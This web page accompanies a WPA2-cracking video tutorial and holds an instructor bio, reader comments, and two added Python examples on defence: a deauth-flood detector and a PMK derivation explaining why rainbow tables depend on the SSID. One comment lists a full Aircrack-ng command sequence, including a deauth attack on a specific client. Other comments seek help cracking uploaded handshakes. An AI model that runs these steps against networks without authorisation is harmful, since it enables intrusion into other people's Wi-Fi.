Cracking WPA2 Tutorial
In this video we will demonstrate how to crack WPA2 using the Aircrack-ng suite (airmon-ng and its companion tools). We will do it by:
- Identifying an access point
- Capturing traffic from that access point
- Attempting to capture the WPA2 handshake. There are two options for doing this:
  - Wait for a client to connect on its own
  - Run a deauth attack to force a connected client to disconnect, then capture the handshake when it reconnects
Once you have captured the handshake, you can attempt to crack it offline with a wordlist or a rainbow table; if the passphrase is in the list, the key is recovered.
Enjoy.
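The deauth step in the outline above is also the loudest part of this attack from the network's side, which is what a wireless IDS keys on. The following Python script is an added example (not code from the video or from the Aircrack-ng project): it counts deauthentication and disassociation frames per BSSID in a sliding time window and raises one alert per BSSID the first time the rate crosses a threshold. The frame log, the BSSIDs and the window/threshold values are all constructed for illustration. Where every AP and client supports 802.11w (Protected Management Frames) the forged deauth is simply rejected; detection like this covers the networks that still carry legacy clients.

```python
"""Sliding-window detector for 802.11 deauthentication floods.

Added example, not from the tutorial or from Aircrack-ng. SAMPLE_FRAMES is a
constructed monitor-mode log: one AP with a couple of widely spaced, normal
deauths and one AP hit by a burst. A real deployment would feed frames from
a capture instead of this list.
"""
from collections import Counter, defaultdict, deque

# 802.11 management frames are type 0; these subtypes evict a client.
MGMT_TYPE = 0
SUBTYPE_BEACON = 0x08
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C
DATA_TYPE = 2

# Constructed BSSIDs (not real networks).
AP_HOME = "aa:bb:cc:dd:ee:01"
AP_FLOODED = "aa:bb:cc:dd:ee:02"

# Constructed sample log. AP_HOME sends two evictions 49 s apart (normal
# client churn); AP_FLOODED gets eight deauths inside 0.35 s.
SAMPLE_FRAMES = [
    {"ts": 0.00, "type": MGMT_TYPE, "subtype": SUBTYPE_BEACON, "bssid": AP_HOME},
    {"ts": 1.00, "type": MGMT_TYPE, "subtype": SUBTYPE_DEAUTH, "bssid": AP_HOME},
    {"ts": 1.50, "type": DATA_TYPE, "subtype": 0x00, "bssid": AP_FLOODED},
    {"ts": 50.00, "type": MGMT_TYPE, "subtype": SUBTYPE_DISASSOC, "bssid": AP_HOME},
    {"ts": 60.00, "type": MGMT_TYPE, "subtype": SUBTYPE_BEACON, "bssid": AP_FLOODED},
] + [
    {"ts": 2.00 + 0.05 * i, "type": MGMT_TYPE, "subtype": SUBTYPE_DEAUTH, "bssid": AP_FLOODED}
    for i in range(8)
]


def is_deauth_like(frame):
    """True for deauthentication and disassociation management frames."""
    return frame["type"] == MGMT_TYPE and frame["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH)


def deauth_totals(frames):
    """Per-BSSID count of eviction frames, useful as a baseline view."""
    return dict(Counter(f["bssid"] for f in frames if is_deauth_like(f)))


def detect_deauth_floods(frames, window_s=10.0, threshold=5):
    """Return one (bssid, window_start_ts, count) alert per BSSID, emitted the
    first time that BSSID sends `threshold` or more eviction frames within
    any `window_s` seconds. Input is sorted by timestamp first, so frames
    that arrive out of order are tolerated.
    """
    recent = defaultdict(deque)  # bssid -> timestamps still inside the window
    alerted = set()
    alerts = []
    for frame in sorted(frames, key=lambda f: f["ts"]):
        if not is_deauth_like(frame):
            continue
        bssid = frame["bssid"]
        q = recent[bssid]
        q.append(frame["ts"])
        # Age out timestamps that fell off the back of the window.
        while frame["ts"] - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append((bssid, q[0], len(q)))
    return alerts


if __name__ == "__main__":
    print("eviction frames per BSSID:", deauth_totals(SAMPLE_FRAMES))
    for bssid, start, count in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"ALERT deauth flood on {bssid}: {count} frames from t={start:.2f}s")
```

The threshold is deliberately low for the toy log; on a real network you would set it from a baseline of that AP's normal eviction rate, and you would want the source address as well so that evictions sent by the AP itself can be told apart from a third party spoofing it.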
Andrew Whitaker
Andrew Whitaker is a Senior Instructor for both the InfoSec Institute and the Intense School. He is also a nationally recognized expert on information security. He has performed penetration tests on numerous financial institutions throughout the United States and has been a regular consultant to government agencies on cyber security. He is also the author of several best-selling security and networking books, including "Penetration Testing and Network Defense" (Cisco Press), "Cisco Router Configuration Handbook" (Cisco Press), and "Chained Exploits: Advanced Hacking Attacks From Start to Finish" (Addison-Wesley). He is also a frequent conference speaker and has given talks on ethical hacking at Defcon, Chicagocon, SecurePhilly, and TakeDownCon. Whitaker also holds a Master’s Degree in Computer Science. He has trained the military, government defense contractors, and intelligence agencies on cyber security, risk management, ethical hacking, reverse engineering and exploit development.
Hi Andrew Whitaker,
My name is Chris.
This video is fine, but the main thing I want to know is how I can crack WPA/WPA2 without a dictionary attack.
I tried to use JTR with the INCREMENTAL switch, piped with JTR. I left it for 5 HOURS but no use.
What else can I do? Because the dictionary file doesn't work all the time, but most of the time.
Can you please try to find something without a dictionary attack?
Can't we brute-force WPA randomly?
One more thing: can you tell me where I can find the largest rainbow table? I want to buy it.
Cheers,
Chris
Andrew’s final comment in the video is “You can’t trust the security of WPA2”, a conclusion which he draws partly on the awful tendency of users (and even administrators) to choose truly weak WPA/WPA2 passphrases, and more completely on the existence of rainbow tables.
There’s a nice article here http://www.renderlab.net/projects/WPA-tables/ about rainbow tables. In summary, there are available rainbow tables in the size of about 33GB which can be downloaded or purchased, and which contain tables for 1 million “words” pre-hashed over the top 1000 most common access point names. (There may be other, even larger and more complete rainbow tables available).
But, still, this relies on the confluence of a moderately common access point name and insufficiently strong passphrase.
I submit that it’s not that you can’t trust the security of WPA2, it’s that almost any security system can be used insecurely.
1. Choose something either random, or very unusual, for your access point name. e.g. “John&Fr3d’z !ccess_p[]1nt_” (I tried, and failed, to find an RFC describing the explicit rules for access point names, but it seems likely that a name could be chosen which is both descriptive and unlikely to appear in the rainbow tables)
2. Choose long, complex passphrases, preferably random, or again as above very unusual (and, due to rainbow tables, in this case “unusual” must go well beyond just “H8cker_sp3ak”).
... or have the rainbow tables become so good and so available that there is, for practical purposes, no adequately secure combination of SSID and passphrase?
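The point in this comment that a table is bound to "the top 1000 most common access point names" follows directly from how WPA2-Personal derives its key. As an added illustration (not part of the comment or the page), the Python below derives the pairwise master key (PMK) exactly as IEEE 802.11i specifies, PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations and a 256-bit output, and shows that the same passphrase gives unrelated keys for two SSIDs that differ by one character. The COMMON_SSIDS set is a constructed stand-in for a table vendor's SSID list, not the real one, and the single test vector is the published one from the 802.11i annex.

```python
"""Why a WPA2 rainbow table only works for the SSIDs it was built against.

Added example, not from the comment above. WPA/WPA2-Personal computes
PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes),
so precomputation has to be repeated per SSID and a table for "linksys"
says nothing about a network called "Linksys", let alone an unusual name.
"""
import hashlib

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i
PMK_BYTES = 32             # 256-bit PMK


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the PMK the way an access point or supplicant does.

    The standard constrains a WPA2-Personal passphrase to 8-63 printable
    ASCII characters and an SSID to 1-32 octets; both limits are enforced
    here so that a malformed input fails loudly instead of silently
    producing a key nothing else would compute.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2-Personal passphrases are 8-63 characters")
    ssid_bytes = ssid.encode("utf-8")
    if not 1 <= len(ssid_bytes) <= 32:
        raise ValueError("SSID must be 1-32 octets")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid_bytes, PBKDF2_ITERATIONS, PMK_BYTES
    )


# Constructed stand-in for the "most common access point names" a table
# would be precomputed against; a real list is far longer.
COMMON_SSIDS = {"linksys", "NETGEAR", "default", "dlink", "xfinitywifi"}


def precomputed_table_applies(ssid: str, common_ssids=COMMON_SSIDS) -> bool:
    """True if a table built for the given SSID list could be used as-is."""
    return ssid in common_ssids


def pmk_differs_across_ssids(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """Same passphrase, two SSIDs: are the resulting PMKs different?"""
    return derive_pmk(passphrase, ssid_a) != derive_pmk(passphrase, ssid_b)


if __name__ == "__main__":
    # Published 802.11i test vector: passphrase "password", SSID "IEEE".
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    for ssid in ("linksys", "Linksys", "John&Fr3d'z !ccess_p[]1nt_"):
        print(f"{ssid!r}: table applies={precomputed_table_applies(ssid)}, "
              f"PMK={derive_pmk('correct horse battery staple', ssid).hex()[:16]}...")
```

The 4096 iterations are also why the comment's second recommendation matters so much: each candidate passphrase costs a full PBKDF2 run per SSID, so a passphrase outside any wordlist combined with an SSID outside any table leaves an attacker with nothing to amortise.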
It is truly a great and useful piece of information. I’m satisfied that you simply shared this helpful info with us. Please keep us up to date like this. Thank you for sharing.
It’d be great if these programs could be run in Windows and/or if they could be run entirely from an .exe file. I cracked a WEP key using Backtrack 4 and a Hawking USB wireless adapter, but that source has since left the building. I tried BT3 and BT5 but they didn’t play nice with my wireless adapter for some reason. It’s not like doing it is hard or anything, it’s just getting used to the command line, and knowing that one wrong character and you have to type the whole line over again. That’s annoying.
I don’t have a GPU-accelerated cracking machine. I have tried some dictionary attacks but they didn’t work. Would anyone be willing to help me crack this WPA handshake?
http://www.mediafire.com/?d5xjpi3857st2xo
Thanks in anticipation
My email id is http://www.google.com/recaptcha/mailhide/d?k=01qjEzTMSs43bbrpJYYqgQlQ==&c=6td13CjLr6kTmdcCz_k_-srrHf_T0AMEejqb9wOfY1Y=
Hey general,
I’d suggest grabbing the guide at http://www.majestysecurity.com. It covers basic and advanced attacks on all types of Wi-Fi networks.
Also you can use online GPU-accelerated services (http://www.gpuhash.com for example) for fast cracking. I tried this one last week and had one password revealed (from 3 handshakes, though).
where to download without CD
What if the password isn't in any wordlist or rainbow table? Is there a way to reverse engineer the handshake?
Hi, may I ask how to crack WPA2/WPA with BackTrack 4 R1? Because I can't capture the WPA handshake. Normally I do it with these steps...
1. airmon-ng
2. airmon-ng start wlan
3. airodump-ng mon0
4. clear
5. airmon-ng stop mon0
6. airmon-ng start wlan0 1
7. clear
8. airodump-ng -c 1 --bssid d8:5d:4c:e6:f3:04 -w wpa mon0
9. aireplay-ng -0 3 -a d8:5d:4c:e6:f3:04 -c 04:48:4c:ff:ff:fe mon0
10. aircrack-ng -w mypass.txt wpa-01.cap
When I do the step between step 8 and 9, the handshake capture doesn't appear. I have waited for a long time, about 4 hours, but it still doesn't appear.
But I have noted that the PSK has changed to MGT after I do step 9.
Can you help me see if my steps are wrong? Can you give me your steps?